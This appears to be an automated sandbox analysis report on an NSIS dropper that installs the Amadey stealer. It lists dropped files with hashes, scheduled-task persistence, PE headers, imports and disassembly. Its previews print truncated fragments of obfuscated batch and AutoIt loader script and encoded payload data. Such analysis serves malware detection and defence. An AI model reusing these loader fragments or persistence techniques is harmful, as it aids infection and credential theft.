D3B63D106C7B51D2547F4F5FB7CAD82D2F28CB055580B1240BB960C074596B131A99D65CB8F588AB999558FCF88DEECE12C73B072B71818A74D532DCD01806BB019252AAEA3A7E294D68E7237A3E0CA4DC98395CB9C81E4D24ABE66DECEBDB6F9384FCAEF7324BDD28078D5C0121DFACCC25E31A5A85E1117DA25A8986D54F36336968CB2F8291E0FA355C6A5C1763CA1249DDD79B79E9D79FFDD9F53DE25DCD810EE450F3BDB7F65C7978483C6EC7927CD4A0ACDF9FE3F6260E24AF0DAB649537A53203DA7391CC197D86432202F87DA1EF2D05E67A41DAFD34D0A5E5B7CD665EB8600DE1CB4F5E47CFA58427CACA80A344ABCA5A87B52425201E4A52456ABC8E026E6F37BF6B16D897D4FCF40C7561A96C22DEF9010B1A3A69C27FA3D752CEBB8B2D44D96BBE746B4C15A5C7E6851F47338A339A7463FAEAD937970CC278B253BFF3D24ED30BF97FB6826D2AA461343FAA562B8FAB9CCC9A224A0E2767293C436173D8133C77DFEF14D85D7BB997848734E4C5D2E3CE6B56CE2E5091A89132336B25AD479E420AF33FFD42D34EE05EF59CD514C930F6CDC4C2C845D0749D02F344A0AF8099509A4508F9FECB2F9834309E12E45F740EB79DE2F23CEA3436BED01525E21E7B34369D9E56AC3F4D1E78FF3DDB2FF4CF868A20A97082FD347A34C68060DBD5689E9331B612EB10C93CA9D9715277

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Remembered

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	218
Entropy (8bit):	4.837043932411244
Encrypted:	false
SSDEEP:	3:I6NwcWqWUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8GmbgElKmE/p3PeUwyJv:IQwcvqjvVg3F+X32l/8xb99E/p/LrJv
MD5:	A9161CABC486B999896B60A235427F7F
SHA1:	40927B07B516314EB46745E0CD843BF7D8ABEAF2
SHA-256:	D9645C520B048BDB1A7774C4D376149966EEE672E0218FE28C76C76A903B4E58
SHA-512:	E669609A5D170B1F5D6F397E1828F3980A003C901B46C3385A21A1438F20DF812066F722AA9C4EEF010BC41571F26315FE95BC3719D34BDDC89D72B215CDA48F
Malicious:	false
Preview:	AdditionUnitKoreanLn..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[.*.[j..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scenes

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	ASCII text, with very long lines (845), with CRLF line terminators
Category:	dropped
Size (bytes):	15458
Entropy (8bit):	5.043927798666608
Encrypted:	false
SSDEEP:	384:vNjoC/df8SNwNJJ4qWzzZSouVcB1KxK1qxdHAVE1:FjveSNwNL4Tzz6c2xdO6
MD5:	E968549E1590F4D87F026F40231C0503
SHA1:	64BB1B1DF57209EFDB29489024AB65C0F205895C
SHA-256:	37B4C4E81A6C7176E630FB0CF1A80F5935C405030C02E184A51D6C07F490956E
SHA-512:	F997A3C09196B38422C2142EB5FFADAA7575D44BA6AC498F99796BE4866DDF7B73A6948FB5A501BB14D8346517EE2AA3830351EF0C32DD14C7C1405E1695F894
Malicious:	false
Preview:	Set Repair=e..SCfPDescending Urban Commit Memories Base Hit Mo Pharmacies Dreams ..bLITeddy Thy Distance Coupled Ozone Jeffrey ..yzoCPersonally ..mlrIRpg ..cDpRIncest Underground Unix ..Set Correction=D..MuAna Nato Export ..dtiAlbania Admitted Annie Rim Secretariat Column ..nPTeenage Plenty Isa Feels Bearing Give ..wTClinic Om ..fBInd Nt Referral Accidents Reset ..QSBoMenu Pen Resumes Subsidiary Reflects Refinance Pads Stories ..OKAFifth Ear Cycling Wherever Gray Hands Rm Reggae Danish ..LnSection Time Coordinator Sudan Offers Sg Transcription ..Set Needle=p..yfvObject Indicator Becomes Romantic Requiring Blogging Secretary Photoshop ..bRbGuilty Argument ..xwYour Usda Recreational Passenger ..iUEMx Ticket Britain Pn ..BifiWi Freely Valuable Canberra Hybrid ..woJAHormone Wma Because Toolbox Hydraulic ..TPmGLegislature Increasingly Bags Mines Fate Chosen Knows Null ..NpApprox Alleged Archives Shopper Enabled Tennessee Medline X Crafts ..PoAlone Rings Loss Month Doors Jurisdiction Pat Sup

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scenes.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (845), with CRLF line terminators
Category:	dropped
Size (bytes):	15458
Entropy (8bit):	5.043927798666608
Encrypted:	false
SSDEEP:	384:vNjoC/df8SNwNJJ4qWzzZSouVcB1KxK1qxdHAVE1:FjveSNwNL4Tzz6c2xdO6
MD5:	E968549E1590F4D87F026F40231C0503
SHA1:	64BB1B1DF57209EFDB29489024AB65C0F205895C
SHA-256:	37B4C4E81A6C7176E630FB0CF1A80F5935C405030C02E184A51D6C07F490956E
SHA-512:	F997A3C09196B38422C2142EB5FFADAA7575D44BA6AC498F99796BE4866DDF7B73A6948FB5A501BB14D8346517EE2AA3830351EF0C32DD14C7C1405E1695F894
Malicious:	false
Preview:	Set Repair=e..SCfPDescending Urban Commit Memories Base Hit Mo Pharmacies Dreams ..bLITeddy Thy Distance Coupled Ozone Jeffrey ..yzoCPersonally ..mlrIRpg ..cDpRIncest Underground Unix ..Set Correction=D..MuAna Nato Export ..dtiAlbania Admitted Annie Rim Secretariat Column ..nPTeenage Plenty Isa Feels Bearing Give ..wTClinic Om ..fBInd Nt Referral Accidents Reset ..QSBoMenu Pen Resumes Subsidiary Reflects Refinance Pads Stories ..OKAFifth Ear Cycling Wherever Gray Hands Rm Reggae Danish ..LnSection Time Coordinator Sudan Offers Sg Transcription ..Set Needle=p..yfvObject Indicator Becomes Romantic Requiring Blogging Secretary Photoshop ..bRbGuilty Argument ..xwYour Usda Recreational Passenger ..iUEMx Ticket Britain Pn ..BifiWi Freely Valuable Canberra Hybrid ..woJAHormone Wma Because Toolbox Hydraulic ..TPmGLegislature Increasingly Bags Mines Fate Chosen Knows Null ..NpApprox Alleged Archives Shopper Enabled Tennessee Medline X Crafts ..PoAlone Rings Loss Month Doors Jurisdiction Pat Sup

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Speak

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	164864
Entropy (8bit):	6.4969011802477326
Encrypted:	false
SSDEEP:	3072:l8p65Nu+dVtqi/x4Rqf21Rgat0g/bZaUAg0FuPOKBNEBNUGXEyaAP:lTDD/xcq21R1p/rAOPOei7TdP
MD5:	7017F4ECE055F6D7321764437F911B23
SHA1:	33DB2EB3A3D1DABA3D1216C31DDACB45460BBA78
SHA-256:	2850A0CF772DB3E80E2714B3951E05DB7EB181D4C5CFA2682D515738E06F6B72
SHA-512:	5D97FCE71B28170325AD0257165418897FC163904AC25D324E81FD2BE8E08A93701D56EBFAB21F43E6E94086F94514B80FCB902C8F3D93430DAD0F28E09E53CC
Malicious:	false
Preview:	......f9.wu.Q.M...`L..F....h..I..M..3O..j%[..f..t.P.M..:L..F...wf;.u.3.f9.wtrf......Fh..........P.u.....I..M..t.......P.O.....0h.K....O...E.P.M..N..h.K..M..O....P.M...K.....wf..t .8...h.K..M...lO...E.P.M..@N....t..M..E.P....M...R...M...R.._^[..]...U...PSV.M.M.W.H...M.."H...M...H...].3.....<....C..E......83...E..E..E....f........j$Yj@FZf;.......f9.wu.Q.M....J..F.v...h..I..M...M..j$[..f..t.P.M...J..F...wf;.u.3.f9.w..N....E.FP.M...R...M...P...u..u...\|.I.S.E.P.E.P.n.....t....~....C..M..0.:N.........h.K..M...$N...E.P.M...L..h.K.....f;.......f9.wu.R.0...h..I..M...M..j@[..f..t.P.M...J..F...wf;.u.3.f9.w.......E.FP.M..RQ...M..RO...u..u...\|.I..M.E.P.E.P......x..M.....u..M..[L...<...h.K..M...gM...E.P.M..;L..h.K..M..NM....P.M..~I.....wf..t;.U...h.K..M..(M...E.P.M...K....h.K..M....M...E.P.M...K....t..M..E.P.+....M.....M..P...M..P...M..P.._^[..]...U..QS.].V.u.W.M...E....8....u9...j....A...R...U...M.....t....S.j5Y...f9H.t.3._^[..]....C.....M...@.Pjz..........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Spectrum

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	6.533226909312395
Encrypted:	false
SSDEEP:	1536:cCV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGDox2S3hPm:cCV26MqgQTc5F446iYNpK5Sc
MD5:	738DA057AE796CA14E8506E15E5CC603
SHA1:	823F5AD7957BC0D0DEC36610CE695D8F5E641E54
SHA-256:	DA17AE9E33F991657A53FF8425EFA8F451069D2293C315CA7C93CB780E52C831
SHA-512:	D9859856A69626C510B06A7602B8B727CFD0A1F96D85D1C863D212F757ED1926DAE1E7625F9FFAC13289CC3ABB80AD6CE7DDA829EAD4333B4E237EA1E25E689D
Malicious:	false
Preview:	w..R.+.r...........S.._@..S..R...P.....S..RichR..........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Twelve

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	ASCII text, with very long lines (2572), with CRLF line terminators
Category:	dropped
Size (bytes):	218112
Entropy (8bit):	4.589962332986312
Encrypted:	false
SSDEEP:	3072:36AFy7V+yzw1x1V/EzSTX7geR9GVjpLyK:36AFyhLz8BEigerG1pLZ
MD5:	A20592F9C9F363A59627C5315675CD9B
SHA1:	1018AB78595ABFE0E82A498B74F1AD4CFE0DBB43
SHA-256:	E9A08F7197DB7A358B3A30AFA725229A4ED195F8212EC6D740425506AFA03095
SHA-512:	0BAD8356C2D7F54F1302587F5267D95E7D4951690514378F88B4C7E0C376A7D73A9DDCF1CDEE29EE6CCF0C4C0F9E325535F31AE68A11895926DAAE736F4FAC5D
Malicious:	false
Preview:	tSize(FUCKED("77^117^109^122^111^113^118^111^72",9-1))..$promotedegyptclinictips = $promotedegyptclinictips + 511598/511598..EndSwitch..WEnd..While 139..$SamuelUndertakenVanilla = 25481..Switch $SamuelUndertakenVanilla..Case 25479..IsDeclared(FUCKED("74^109^122^115^109^116^109^129^72^86^105^126^72^74^109^116^124^123^72^89^125^105^118^124^113^124^113^109^123^72",13-5))..Log(6243)..DirGetSize(FUCKED("73^85^92^75^88^89^67",9-3))..MemGetStats()..IsDeclared(FUCKED("75^120^123^120^126^112^113^51^79^123^110^114^112^113^125^51^78^119^106^107^117^110^124^51^80^110^125^124^51",17-8))..DirGetSize(FUCKED("91^110^126^119^114^120^119^52^76^110^117^117^126^117^106^123^52^77^114^118^52",10-1))..Chr(287)..PixelGetColor(FUCKED("88^122^105^107^124^113^107^109^123^102^85^119^108^125^116^105^122^102",13-5), FUCKED("88^122^105^107^124^113^107^109^123^102^85^119^108^125^116^105^122^102",13-5))..$SamuelUndertakenVanilla = $SamuelUndertakenVanilla + 836386/836386..Case 25480..ObjGet(FUCKED("72^84^83^72^84^87^7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Venture

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	ASCII text, with very long lines (2572), with CRLF line terminators
Category:	dropped
Size (bytes):	204800
Entropy (8bit):	4.072701218427028
Encrypted:	false
SSDEEP:	3072:o4zRzqEjGnsQpcVSHMM5erRIwd/pZ8Qk9:xmEjWlRs2erRvpeF9
MD5:	D0E6B3AFAED008A391E30F3298D492DC
SHA1:	3998AC9108DE444C285F154EA068A9B2EAB15732
SHA-256:	173CFDAEAA9117971A23720B31C84A3A97E9652C310B47A7418DBF0816C99493
SHA-512:	1F4D3DCE84EA40D65BF96F9D6D2A76C9CA33D596F7BDDF175250E921532DE92D2ACA6E1C63A83E1F5CB570BD82B86890E0812AC7A4A90B0A1C170700A2078408
Malicious:	false
Preview:	D317083C919457D0E17A50BB222EC460B2F5F6974609EC1700954A10053DC9DC27F0EC4B2C6AAA80128E85DAD4EF4A5436FB59AF6C4B534B8E54261791785BFC3173283CC932CDCF6B94207B500429955F33BF93326E02610C0C8A7CF79BD06C4E1624407201454A113F092391BD5C789E91AC5320103B6183EB891AED33BD0E9A43B658253DCED3B2E6E34'..$iHLPSV = $iHLPSV & '66C1080CAA8FFD72021FBEBABF0AA4B0108CBFFA79E711432703B87D00716AC515A253EFCB2E86C2DF7F3669E14B73C716B97D812D321862748171DB3B66A4A8C4F8991690238D13802301574A2DBB83D03645273CBAA9B34584DAC449338C0186FFDDE4D7FBF9DE797E3416F9964C4CD8812DC5CA20CE45FBE4AE89608332918F3F860A42F92A0379E4FE3DE3555C11F23C78B57E5A5043A9635202D90E94CCB4C9E55AE1ADB9833B31C1572FD1555BF8D1E8728B0ECC173FB30050FD5927BBBCCDD04A11EB899649851E924B8D9608D252220F57F31C54BF6DDDC4A94E379BB25A803DEDE63F9E0A86031021CD0ADBF02E10747BDA99E32C8AE5DEF884B316ED773A72616FDA9505103FA4860CFAAE4DA2A28EB2B07D10B0E05B6196E38CFF155CBE6CBE4C2CE5C4C2CBC4F956B3C52A919168069883563C0FDA982914B79F3389B7F2A32AB55421D5FAFC880291F31DAD97260F146291DB9F39D6E

C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Download File

Process:	C:\Windows\System32\OpenWith.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	437248
Entropy (8bit):	6.521310999547484
Encrypted:	false
SSDEEP:	12288:VHV3dMrZOzwaQl71dTylBGqupeU8N8UAK27:V1NMrZ+wp1yW5vK8
MD5:	5A14BA286D692A6D65DBCF7340EA1C8C
SHA1:	18F9696DC24D77C26A2DFCC8F5AC72400AAAFCD5
SHA-256:	BEF37C1E8C99F3AFDEDE1C218F103EA4C6ADECED20B332776D7FD6A8A18305CA
SHA-512:	8D7C49D14C6EA1A9A6A4A4E296803B80C055618A4E934059B9FB430C3B723317509EF70604494A4F33F763790C1773F2C32071B2BE57F9C590FE7A3AD91FF646
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55% Antivirus: Virustotal, Detection: 53%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L......f............................9........ ....@.......................................@................................../...................................M.....8..........................(...@............ .. ............................text.............................. ..`.rdata...!... ..."..................@..@.data....E...P...2.................@....rsrc................\..............@..@.reloc...M.......N...^..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\246122658369

Download File

Process:	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	86396
Entropy (8bit):	7.857204125908806
Encrypted:	false
SSDEEP:	1536:CJ24dtBHS/W0d0hbbSbaA2+WS3KMYkVYjgrMb8kFVCy5Ik6B8CRwOy9w7:H4dtm0h/EaA2+WS3KDkYCMbFVZx623Ol
MD5:	F9B7FD9E9D658A8F4ABA43D70D446252
SHA1:	FC3A1F1C099C53D4220BD94DB872C78BDB42E902
SHA-256:	19EC1D5C2AF6952B6176EAD3447DE563A7DB08EA540F99204F903146E8E2BEE1
SHA-512:	0522E810F9E2A47FA09A5193E857C40B3F785DFADBB47F443100CEF6D7CFBA1099835B6103F425868B9FD8F37B88D87AE6F0858902C30D03291B13FD97380B0B
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....

C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Yuem.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	437248
Entropy (8bit):	6.521310999547484
Encrypted:	false
SSDEEP:	12288:VHV3dMrZOzwaQl71dTylBGqupeU8N8UAK27:V1NMrZ+wp1yW5vK8
MD5:	5A14BA286D692A6D65DBCF7340EA1C8C
SHA1:	18F9696DC24D77C26A2DFCC8F5AC72400AAAFCD5
SHA-256:	BEF37C1E8C99F3AFDEDE1C218F103EA4C6ADECED20B332776D7FD6A8A18305CA
SHA-512:	8D7C49D14C6EA1A9A6A4A4E296803B80C055618A4E934059B9FB430C3B723317509EF70604494A4F33F763790C1773F2C32071B2BE57F9C590FE7A3AD91FF646
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55% Antivirus: Virustotal, Detection: 53%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L......f............................9........ ....@.......................................@................................../...................................M.....8..........................(...@............ .. ............................text.............................. ..`.rdata...!... ..."..................@..@.data....E...P...2.................@....rsrc................\..............@..@.reloc...M.......N...^..............@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\Dctooux.job

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Yuem.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.3990386680057263
Encrypted:	false
SSDEEP:	6:X5OXpRKUEZ+lX1zmlXqd6tPjgsW2YRZuy0lKI1ut0:XipRKQ1u4AjzvYRQVMt0
MD5:	69EEB2871303DB3CBA93E875F410739F
SHA1:	9228DC2F302102D39E585830DD8C83FBB96775C4
SHA-256:	0348C1230AF6C86191344F96FC2867335A051651977A5169A9B52C4BC7055B49
SHA-512:	DE4FACF8F62B17EC9117A59D1EDCE0293266FC946D87D48865AD2D035E47206548B6348774EB4C23ACA97287D0175711D74491B26942C4FDBCCC76CC228AA5C9
Malicious:	false
Preview:	....b....H.\|*...%2F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.c.c.b.f.b.9.d.5.0.e.\.D.c.t.o.o.u.x...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.988985337182479
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	J2NWKU2oJi.exe
File size:	961'456 bytes
MD5:	9e64b65535e29ec152642d8bdcb22974
SHA1:	5431aa7526ba193c0a92afffe2537bc54f51a0ba
SHA256:	6586cb8766c14a87330bf6c79a7cbd7cbff3ca9da63574a9c348645117d08f14
SHA512:	f895c62431502fa92d36b5e0cb929b4957ca41f9253dadecd6a06153dc566e12a5d835a162f6aeb0e8ea1eb1fb9c65ab716f7c43faca0672aff37900c56b156e
SSDEEP:	24576:cbSLx7bBqTC9oA414OYDsSyMZblh50gjuQk47blB7uFujRVeYr4c:GS79qK4cDs6q7QX7bl1u6LzMc
TLSH:	1A152304255088B3DEB3B1F3BDA5C027837AC95D61B0BBCB07D13A9DBD16849D96E6C8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	5996e36767e4e366

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FD74CEB6BAAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FD74CEB6B7Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x3d58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	ce9df19df15aa7bfbc0a8d0af0b841d0	False	0.6661261792452831	data	6.458398214928006	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	a118375c929d970903c1204233b7583d	False	0.4392755681818182	data	5.024109281264143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	82a10c59a8679bb952fc8316070b8a6c	False	0.521484375	data	4.15458210408643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x46000	0x3d58	0x3e00	9d98e661c8697043940dc0bf40b70384	False	0.92578125	data	7.725485791198388	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x461c0	0x3146	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0008720469319803
RT_ICON	0x49308	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8466312056737588
RT_DIALOG	0x49770	0x100	data	English	United States	0.5234375
RT_DIALOG	0x49870	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x49990	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x499f0	0x22	data	English	United States	0.9705882352941176
RT_MANIFEST	0x49a18	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, 